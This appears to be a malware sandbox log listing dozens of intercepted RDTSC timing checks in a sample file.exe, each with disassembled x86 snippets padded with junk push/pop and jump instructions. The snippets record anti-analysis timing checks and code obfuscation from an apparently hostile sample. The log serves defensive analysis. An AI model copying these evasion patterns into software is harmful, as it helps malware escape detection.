Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB1941 second address: DB1945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE50 second address: DBEE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE56 second address: DBEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCEF88 second address: DCEFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 js 00007F5E8080F362h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCEE41 second address: DCEE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCEE45 second address: DCEE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD243D second address: DD2443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD2443 second address: DD2449 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD2449 second address: DD244F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD244F second address: DD2463 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E8080F35Ch 0x00000008 jns 00007F5E8080F356h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB057 second address: DEB05D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB05D second address: DEB06F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a jng 00007F5E8080F356h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB06F second address: DEB08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E810FCBB7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB35F second address: DEB369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5E8080F356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB369 second address: DEB36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB4D0 second address: DEB4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEB967 second address: DEB984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5E810FCBB4h 0x0000000b jmp 00007F5E810FCBACh 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEBC69 second address: DEBC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEBD9F second address: DEBDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEBECB second address: DEBECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEBECF second address: DEBEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5E810FCBB4h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 jno 00007F5E810FCBA6h 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0161 second address: DF0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5E8080F366h 0x00000010 jmp 00007F5E8080F360h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF05A6 second address: DF05BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E810FCBAAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF05BE second address: DF0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007F5E8080F35Bh 0x00000016 push dword ptr [ebp+122D2B6Fh] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5E8080F358h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and edx, 62F2137Ah 0x0000003c push 3B088027h 0x00000041 je 00007F5E8080F371h 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF18E4 second address: DF18E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF18E9 second address: DF18F3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E8080F35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3499 second address: DF34A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F5E810FCBA6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4E74 second address: DF4EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F5E8080F356h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F5E8080F39Bh 0x00000014 pushad 0x00000015 jmp 00007F5E8080F361h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F5E8080F356h 0x00000025 jmp 00007F5E8080F35Ch 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480B71 second address: 5480B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480B89 second address: 5480B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480B96 second address: 5480BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 6F6709D1h 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480BBD second address: 5480BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480BD6 second address: 5480BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C091B second address: 54C0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F5E8080F363h 0x0000000b adc cx, E68Eh 0x00000010 jmp 00007F5E8080F369h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movsx ebx, ax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0960 second address: 54C09AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5E810FCBB7h 0x0000000b or eax, 777CD14Eh 0x00000011 jmp 00007F5E810FCBB9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5E810FCBACh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C09AF second address: 54C09B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460138 second address: 546016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov dh, ch 0x0000000e mov dx, C8ACh 0x00000012 popad 0x00000013 push dword ptr [ebp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5E810FCBAEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546016A second address: 546017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546017C second address: 5460180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460180 second address: 54601B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov bx, 8410h 0x00000010 call 00007F5E8080F369h 0x00000015 push esi 0x00000016 pop ebx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601B6 second address: 54601CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548088E second address: 5480894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480894 second address: 5480921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBB9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5E810FCBACh 0x00000013 adc cx, 68A8h 0x00000018 jmp 00007F5E810FCBABh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F5E810FCBB8h 0x00000024 sub al, 00000008h 0x00000027 jmp 00007F5E810FCBABh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 pop ebx 0x00000036 popad 0x00000037 jmp 00007F5E810FCBACh 0x0000003c popad 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F5E810FCBAAh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480921 second address: 5480925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480925 second address: 548092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54804DC second address: 54804E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54804E0 second address: 54804E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54804E6 second address: 54804F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54804F7 second address: 5480536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5E810FCBAEh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F5E810FCBB0h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480536 second address: 548053A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548053A second address: 5480540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480540 second address: 5480546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548044E second address: 5480452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480452 second address: 5480456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480456 second address: 548045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548045C second address: 548046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480216 second address: 548021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548021A second address: 5480220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480220 second address: 54802AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 70E5D11Fh 0x00000008 pushfd 0x00000009 jmp 00007F5E810FCBB4h 0x0000000e sbb ax, 1288h 0x00000013 jmp 00007F5E810FCBABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F5E810FCBB6h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov ax, di 0x00000027 pushfd 0x00000028 jmp 00007F5E810FCBADh 0x0000002d add cx, B856h 0x00000032 jmp 00007F5E810FCBB1h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F5E810FCBAEh 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov dx, F890h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480EA6 second address: 5480F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 66EAh 0x00000007 mov ebx, 1F8307B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E8080F363h 0x00000017 adc eax, 268EC03Eh 0x0000001d jmp 00007F5E8080F369h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F5E8080F360h 0x00000029 add cx, F538h 0x0000002e jmp 00007F5E8080F35Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 pushad 0x00000039 jmp 00007F5E8080F362h 0x0000003e mov ah, 03h 0x00000040 popad 0x00000041 call 00007F5E8080F367h 0x00000046 call 00007F5E8080F368h 0x0000004b pop ecx 0x0000004c pop edi 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F60 second address: 5480F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F64 second address: 5480F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08B5 second address: 54C08BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08BB second address: 54C08BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08BF second address: 54C08C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0040 second address: 54A0077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e call 00007F5E8080F363h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0077 second address: 54A008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov cl, dl 0x0000000a mov si, 0AF3h 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A008E second address: 54A0092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0092 second address: 54A0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0096 second address: 54A009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A009C second address: 54A00D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F5E810FCBB0h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E810FCBB7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54803B0 second address: 54803B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54803B4 second address: 54803BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490BED second address: 5490C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E8080F35Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E3C second address: 5490E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E810FCBB7h 0x00000008 pop eax 0x00000009 mov ch, dl 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBAEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0053 second address: 54C0057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0057 second address: 54C0074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0074 second address: 54C007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C007A second address: 54C007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C01C3 second address: 54C0205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F5E8080F367h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, dx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0205 second address: 54C020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C020A second address: 54C0227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F369h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0227 second address: 54C026E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBB6h 0x00000011 add ecx, 69019F08h 0x00000017 jmp 00007F5E810FCBABh 0x0000001c popfd 0x0000001d popad 0x0000001e leave 0x0000001f pushad 0x00000020 push esi 0x00000021 jmp 00007F5E810FCBABh 0x00000026 pop ecx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C026E second address: 54C02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5E8080F365h 0x0000000a and cx, B8D6h 0x0000000f jmp 00007F5E8080F361h 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [00B52014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F5E851BF53Ah 0x00000032 push FFFFFFFEh 0x00000034 jmp 00007F5E8080F35Eh 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02BB second address: 54C02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02C1 second address: 54C031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F362h 0x00000009 add cx, D958h 0x0000000e jmp 00007F5E8080F35Bh 0x00000013 popfd 0x00000014 jmp 00007F5E8080F368h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e push eax 0x0000001f call 00007F5E851BF593h 0x00000024 mov edi, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5E8080F367h 0x0000002d rdtsc
